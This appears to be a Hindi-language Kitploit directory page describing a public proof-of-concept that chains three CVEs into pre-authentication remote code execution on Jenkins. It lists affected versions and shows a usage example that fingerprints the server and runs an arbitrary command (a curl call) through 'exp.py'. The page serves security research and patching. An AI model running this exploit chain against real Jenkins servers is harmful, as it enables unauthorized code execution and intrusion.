Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
awesome-jenkins-rce-2019 — मई 2017 से Jenkins में कोई pre-auth RCE नहीं है, लेकिन यह वही है! | Kitploit
उपकरण/GitHubGitHub/orangetw/awesome-jenkins-rce-2019
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHuborangetw/awesome-jenkins-rce-2019

awesome-jenkins-rce-2019

मई 2017 से Jenkins में कोई pre-auth RCE नहीं है, लेकिन यह वही है!

रिपॉजिटरी देखें
6101277 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

awesome-jenkins-rce-2019

मई 2017 से Jenkins में कोई pre-auth RCE नहीं है, लेकिन यह वही है!

यह CVE-2018-1000861, CVE-2019-1003005 और CVE-2019-1003029 को जोड़कर एक अधिक विश्वसनीय और सुरुचिपूर्ण pre-auth रिमोट कोड निष्पादन बनाता है!

प्रभावित सूची

  • ANONYMOUS_READ अक्षम

    • Jenkins संस्करण < 2.138
  • ANONYMOUS_READ सक्षम(या सामान्य उपयोगकर्ता खाते के साथ)

    • Jenkins बिल्ड समय < 2019-01-28

उपयोग

root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

परीक्षण किया गया

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

आभार

  • @orange_8361 CVE-2018-1000861 के लिए
  • @0ang3el CVE-2019-1003005 के लिए
  • @webpentest CVE-2019-1003029 के लिए

मेरी HITB AMS 2019 टॉक की कुछ स्लाइड्स:

1.png 2.png 3.png

संदर्भ

  • Jenkins हैकिंग भाग 1 - डायनामिक रूटिंग के साथ खेलें
  • Jenkins हैकिंग भाग 2 - Unauthenticated RCE के लिए मेटा प्रोग्रामिंग का दुरुपयोग!
  • Jenkins सुरक्षा सलाह 2018-12-05
  • Jenkins सुरक्षा सलाह 2019-01-28
  • Jenkins सुरक्षा सलाह 2019-03-06
टूल डाउनलोड करें